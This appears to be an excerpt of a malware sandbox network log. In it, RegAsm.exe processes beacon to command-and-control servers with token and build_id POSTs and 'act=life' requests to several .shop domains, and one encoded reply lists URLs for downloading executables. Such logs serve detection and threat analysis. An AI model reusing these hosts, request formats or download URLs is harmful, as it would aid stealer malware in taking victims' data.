2024-09-26 23:38:08 UTC	16355	OUT	Data Raw: 48 64 76 2b 6e 41 50 46 63 56 54 46 34 57 71 75 57 70 71 6b 2f 78 50 55 6f 35 64 6a 38 50 4c 6e 70 61 4e 72 70 32 2f 77 43 44 70 59 36 66 2f 68 4c 2f 41 42 42 2f 30 45 6d 2f 37 38 78 2f 2f 45 30 66 38 4a 66 34 67 2f 36 43 54 66 38 41 66 6d 50 2f 41 4f 4a 72 6c 37 76 56 72 4b 4f 32 75 6c 67 53 37 46 78 61 36 64 62 58 37 79 79 4f 70 69 66 7a 64 67 32 59 32 67 71 66 33 6e 48 7a 48 4f 44 54 70 64 54 73 76 74 39 33 70 4d 50 32 70 72 2b 31 53 55 47 66 4b 6d 46 35 6f 31 4c 4f 67 58 62 6b 44 35 57 41 62 64 31 41 4f 4f 65 4f 66 32 6d 58 2f 77 41 76 66 38 4e 7a 73 64 4c 4f 46 62 33 39 2f 50 76 73 76 36 30 4f 6d 2f 34 53 2f 77 41 51 66 39 42 4a 76 2b 2f 4d 66 2f 78 4e 5a 74 2f 71 46 33 71 64 77 4c 69 39 6e 4d 30 6f 51 49 47 4b 71 76 79 67 6b 34 34 41 48 63 31 6c 52 Data Ascii: Hdv+nAPFcVTF4WquWpqk/xPUo5dj8PLnpaNrp2/wCDpY6f/hL/ABB/0Em/78x//E0f8Jf4g/6CTf8AfmP/AOJrl7vVrKO2ulgS7Fxa6dbX7yyOpifzdg2Y2gqf3nHzHODTpdTsvt93pMP2pr+1SUGfKmF5o1LOgXbkD5WAbd1AOOeOf2mX/wAvf8NzsdLOFb39/Pvsv60Om/4S/wAQf9BJv+/Mf/xNZt/qF3qdwLi9nM0oQIGKqvygk44AHc1lR
2024-09-26 23:38:08 UTC	15779	OUT	Data Raw: 46 4a 53 30 6c 4d 59 55 6c 4c 53 55 44 45 6f 4e 46 42 6f 47 68 4b 53 6c 70 4b 41 43 6d 6d 6e 55 30 30 44 43 69 69 69 67 59 6c 4a 51 61 4b 42 67 61 53 69 69 67 59 6c 46 46 46 41 78 4b 53 67 30 55 44 51 55 6c 46 4a 33 6f 47 4c 53 47 67 30 47 67 42 4b 54 74 52 52 51 55 4a 53 47 6e 47 6d 6d 67 61 46 70 4b 4b 4b 42 69 66 53 6b 70 61 53 67 42 44 7a 52 51 65 61 4b 43 68 4d 38 55 6e 57 6c 4e 4a 51 4d 4b 53 6c 70 74 41 42 52 33 70 61 54 70 51 4d 53 69 6a 70 52 6d 67 59 68 70 4b 58 4e 49 66 2f 41 4e 56 41 77 70 4b 50 65 67 39 61 42 68 32 70 4f 74 42 6f 37 39 61 41 44 2f 50 57 6b 7a 2f 6b 30 47 69 67 6f 53 67 2f 6c 52 32 6f 48 61 67 41 7a 31 7a 53 45 2f 55 30 5a 35 6f 7a 51 4d 54 47 4f 39 46 4c 2b 76 76 69 6b 46 41 78 4f 39 42 6f 42 6f 6f 41 44 31 70 4d 30 44 72 51 Data Ascii: FJS0lMYUlLSUDEoNFBoGhKSlpKACmmnU00DCiiigYlJQaKBgaSiigYlFFFAxKSg0UDQUlFJ3oGLSGg0GgBKTtRRQUJSGnGmmgaFpKKKBifSkpaSgBDzRQeaKChM8UnWlNJQMKSlptABR3paTpQMSijpRmgYhpKXNIf/ANVAwpKPeg9aBh2pOtBo79aAD/PWkz/k0GigoSg/lR2oHagAz1zSE/U0Z5ozQMTGO9FL+vvikFAxO9BoBooAD1pM0DrQ
2024-09-26 23:38:10 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:38:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 23:38:10 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.7	49733	5.75.211.162	443	1092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:38:10 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----AEHIDAKECFIEBGDHJEBK User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 23:38:10 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 61 66 37 31 33 31 34 36 64 30 61 38 39 38 61 32 62 32 63 64 34 65 38 62 61 32 33 32 38 38 66 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 32 36 37 33 35 63 62 65 38 63 61 39 65 37 35 37 31 32 66 66 65 33 61 61 34 30 63 34 61 36 30 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 4b 0d 0a 43 6f 6e 74 Data Ascii: ------AEHIDAKECFIEBGDHJEBKContent-Disposition: form-data; name="token"daf713146d0a898a2b2cd4e8ba23288f------AEHIDAKECFIEBGDHJEBKContent-Disposition: form-data; name="build_id"b26735cbe8ca9e75712ffe3aa40c4a60------AEHIDAKECFIEBGDHJEBKCont
2024-09-26 23:38:11 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:38:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 23:38:11 UTC	280	IN	Data Raw: 31 30 63 0d 0a 4d 54 49 79 4d 54 6b 34 4e 6e 78 6f 64 48 52 77 4f 69 38 76 4d 54 51 33 4c 6a 51 31 4c 6a 51 30 4c 6a 45 77 4e 43 39 77 63 6d 39 6e 4c 7a 59 32 5a 6a 56 6b 59 6d 46 6a 59 54 4d 30 59 57 4e 66 62 47 5a 6b 62 6e 4e 68 5a 6d 35 6b 63 79 35 6c 65 47 56 38 4d 58 78 72 61 32 74 72 66 44 45 79 4d 6a 45 35 4f 44 64 38 61 48 52 30 63 44 6f 76 4c 7a 45 30 4e 79 34 30 4e 53 34 30 4e 43 34 78 4d 44 51 76 63 48 4a 76 5a 79 38 32 4e 6d 59 31 5a 47 49 35 5a 54 55 30 4e 7a 6b 30 58 33 5a 6d 61 32 46 6e 61 33 4d 75 5a 58 68 6c 66 44 46 38 61 32 74 72 61 33 77 78 4d 6a 49 78 4f 54 67 34 66 47 68 30 64 48 41 36 4c 79 38 78 4e 44 63 75 4e 44 55 75 4e 44 51 75 4d 54 41 30 4c 33 42 79 62 32 63 76 4e 6a 5a 6d 4e 57 52 6c 4e 7a 4a 6b 4f 57 56 69 5a 46 39 79 5a 48 Data Ascii: 10cMTIyMTk4NnxodHRwOi8vMTQ3LjQ1LjQ0LjEwNC9wcm9nLzY2ZjVkYmFjYTM0YWNfbGZkbnNhZm5kcy5leGV8MXxra2trfDEyMjE5ODd8aHR0cDovLzE0Ny40NS40NC4xMDQvcHJvZy82NmY1ZGI5ZTU0Nzk0X3Zma2Fna3MuZXhlfDF8a2tra3wxMjIxOTg4fGh0dHA6Ly8xNDcuNDUuNDQuMTA0L3Byb2cvNjZmNWRlNzJkOWViZF9yZH

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.7	49735	5.75.211.162	443	1092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:38:13 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GCAKKECAEGDGCBFIJEGH User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 499 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 23:38:13 UTC	499	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 43 41 4b 4b 45 43 41 45 47 44 47 43 42 46 49 4a 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 61 66 37 31 33 31 34 36 64 30 61 38 39 38 61 32 62 32 63 64 34 65 38 62 61 32 33 32 38 38 66 0d 0a 2d 2d 2d 2d 2d 2d 47 43 41 4b 4b 45 43 41 45 47 44 47 43 42 46 49 4a 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 32 36 37 33 35 63 62 65 38 63 61 39 65 37 35 37 31 32 66 66 65 33 61 61 34 30 63 34 61 36 30 0d 0a 2d 2d 2d 2d 2d 2d 47 43 41 4b 4b 45 43 41 45 47 44 47 43 42 46 49 4a 45 47 48 0d 0a 43 6f 6e 74 Data Ascii: ------GCAKKECAEGDGCBFIJEGHContent-Disposition: form-data; name="token"daf713146d0a898a2b2cd4e8ba23288f------GCAKKECAEGDGCBFIJEGHContent-Disposition: form-data; name="build_id"b26735cbe8ca9e75712ffe3aa40c4a60------GCAKKECAEGDGCBFIJEGHCont
2024-09-26 23:38:14 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:38:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 23:38:14 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.7	49736	172.67.194.216	443	5236	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:38:14 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: wallkedsleeoi.shop
2024-09-26 23:38:14 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 23:38:14 UTC	772	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 23:38:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=18hk0a5cagfm5bhbf9h8v397um; expires=Mon, 20 Jan 2025 17:24:53 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vVzik2k9biCN%2BsG3nXC937s8LFNk80OFXjG%2BZBye7Tg85V6HMf3pe8LVZBA10OKRdaw4Z4bEKsfUgmkF3FGPYcJQNoApr7petb0WTUHVh812iSB2NAuVPwyWN6f0%2BsHWgszNO0A%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c97161efa84c329-EWR
2024-09-26 23:38:14 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 23:38:14 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.7	49737	172.67.132.32	443	5236	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:38:15 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: gutterydhowi.shop
2024-09-26 23:38:15 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 23:38:15 UTC	772	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 23:38:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ihsjet1ovlm3jrh8kp3oeame4v; expires=Mon, 20 Jan 2025 17:24:54 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=edyb%2Fb8hPU4OVr3Kk%2Fur4sEkIkIaOfYGlr7mzOWkZEtBy2bNeFpFCOOxZyI0UFrypri9xdOGbciLe4izCg8UQYIUmC1ZUnuxgj6QbpYmQiwhRuJ7aYooReAyTtnTEoeUsIW6eQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c971624c84242f7-EWR
2024-09-26 23:38:15 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 23:38:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.7	49739	188.114.96.3	443	5236	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:38:16 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: ghostreedmnu.shop
2024-09-26 23:38:16 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 23:38:16 UTC	782	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 23:38:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=d8bv1fides389u4sseicvbgffj; expires=Mon, 20 Jan 2025 17:24:55 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1SbLuDZjYFaVIbd6If%2FhKVfuNT2%2BCHkR7spbyq%2BU7zsh%2BMqFvtmhjEx7P3J%2F%2FKrot4TOgvE6GxdenToT2Y9OWxgrvGxV36akzbZPohHPU6IiPwrA%2FoTGuMayiSxeO2vl0dGrEg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c97162ae98342e7-EWR
2024-09-26 23:38:16 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 23:38:16 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.7	49738	5.75.211.162	443	1092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:38:16 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----ECGHJJEHDHCAAKFIIDGI User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 499 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 23:38:16 UTC	499	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 43 47 48 4a 4a 45 48 44 48 43 41 41 4b 46 49 49 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 61 66 37 31 33 31 34 36 64 30 61 38 39 38 61 32 62 32 63 64 34 65 38 62 61 32 33 32 38 38 66 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 48 4a 4a 45 48 44 48 43 41 41 4b 46 49 49 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 32 36 37 33 35 63 62 65 38 63 61 39 65 37 35 37 31 32 66 66 65 33 61 61 34 30 63 34 61 36 30 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 48 4a 4a 45 48 44 48 43 41 41 4b 46 49 49 44 47 49 0d 0a 43 6f 6e 74 Data Ascii: ------ECGHJJEHDHCAAKFIIDGIContent-Disposition: form-data; name="token"daf713146d0a898a2b2cd4e8ba23288f------ECGHJJEHDHCAAKFIIDGIContent-Disposition: form-data; name="build_id"b26735cbe8ca9e75712ffe3aa40c4a60------ECGHJJEHDHCAAKFIIDGICont
2024-09-26 23:38:17 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:38:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 23:38:17 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.7	49740	188.114.96.3	443	5236	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:38:17 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: offensivedzvju.shop
2024-09-26 23:38:17 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 23:38:17 UTC	772	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 23:38:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=qqpopb7tneettrfpn367cvpk5l; expires=Mon, 20 Jan 2025 17:24:56 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j8mqCkl6urzoP1AhYiZyakyp6paRKb0R5szhvPPy1%2BPMLLbudiN5PiQWVGWfbNeswWH5RECQPARpe5gckim8LC7SM0ugJhhpF%2FeWPTR5IWs4oZCmvtoxBgZWSuP%2Fcj2cQclKRC%2Fw"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c971630ea2bc431-EWR
2024-09-26 23:38:17 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 23:38:17 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.7	49741	5.75.211.162	443	1092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:38:17 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIIIEGDBKJKEBGCBAFCF User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 499 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 23:38:17 UTC	499	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 49 49 49 45 47 44 42 4b 4a 4b 45 42 47 43 42 41 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 61 66 37 31 33 31 34 36 64 30 61 38 39 38 61 32 62 32 63 64 34 65 38 62 61 32 33 32 38 38 66 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 45 47 44 42 4b 4a 4b 45 42 47 43 42 41 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 32 36 37 33 35 63 62 65 38 63 61 39 65 37 35 37 31 32 66 66 65 33 61 61 34 30 63 34 61 36 30 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 45 47 44 42 4b 4a 4b 45 42 47 43 42 41 46 43 46 0d 0a 43 6f 6e 74 Data Ascii: ------HIIIEGDBKJKEBGCBAFCFContent-Disposition: form-data; name="token"daf713146d0a898a2b2cd4e8ba23288f------HIIIEGDBKJKEBGCBAFCFContent-Disposition: form-data; name="build_id"b26735cbe8ca9e75712ffe3aa40c4a60------HIIIEGDBKJKEBGCBAFCFCont
2024-09-26 23:38:18 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:38:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 23:38:18 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.7	49742	188.114.96.3	443	5236	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:38:18 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: vozmeatillu.shop
2024-09-26 23:38:18 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 23:38:18 UTC	766	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 23:38:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=lvld7f27dchommesrnjijpom13; expires=Mon, 20 Jan 2025 17:24:57 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V7LCPB8iJApIeiTsd2J31MY%2BgXTE23uZIdzgvyO4hixCR6nWw4gJVxrsIMWjaDFugZdVViMIwNRJQ9ms402i5zn0P%2BAPVBqR01lt2QfBoFSBOi1ApV%2Fp5gVl5mpErkymrcV4"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c971637bc30423a-EWR
2024-09-26 23:38:18 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 23:38:18 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.7	49744	172.67.162.108	443	5236	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:38:19 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: drawzhotdog.shop
2024-09-26 23:38:19 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 23:38:20 UTC	768	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 23:38:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=61vdcutimv8q7rg3hr64c7skdn; expires=Mon, 20 Jan 2025 17:24:58 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zE25LIHIfat%2FTBExRxnBLVALynt5Xv6sn7CwaHkJrhgQiOlDxtG9eDODUbP4inJIzhih3wsRBJv2MsBxB7vh2fptBrj86zCcCEMG%2FdrM8r4GjIab7%2FiM5OXd%2BPH2pHkoAVyW"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c971640decc0f6f-EWR
2024-09-26 23:38:20 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 23:38:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.7	49745	5.75.211.162	443	1092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:38:20 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----EBFBKFBGIIIDGDGCFCGI User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 23:38:20 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 42 46 42 4b 46 42 47 49 49 49 44 47 44 47 43 46 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 61 66 37 31 33 31 34 36 64 30 61 38 39 38 61 32 62 32 63 64 34 65 38 62 61 32 33 32 38 38 66 0d 0a 2d 2d 2d 2d 2d 2d 45 42 46 42 4b 46 42 47 49 49 49 44 47 44 47 43 46 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 32 36 37 33 35 63 62 65 38 63 61 39 65 37 35 37 31 32 66 66 65 33 61 61 34 30 63 34 61 36 30 0d 0a 2d 2d 2d 2d 2d 2d 45 42 46 42 4b 46 42 47 49 49 49 44 47 44 47 43 46 43 47 49 0d 0a 43 6f 6e 74 Data Ascii: ------EBFBKFBGIIIDGDGCFCGIContent-Disposition: form-data; name="token"daf713146d0a898a2b2cd4e8ba23288f------EBFBKFBGIIIDGDGCFCGIContent-Disposition: form-data; name="build_id"b26735cbe8ca9e75712ffe3aa40c4a60------EBFBKFBGIIIDGDGCFCGICont
2024-09-26 23:38:20 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:38:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 23:38:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.7	49746	188.114.96.3	443	5236	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

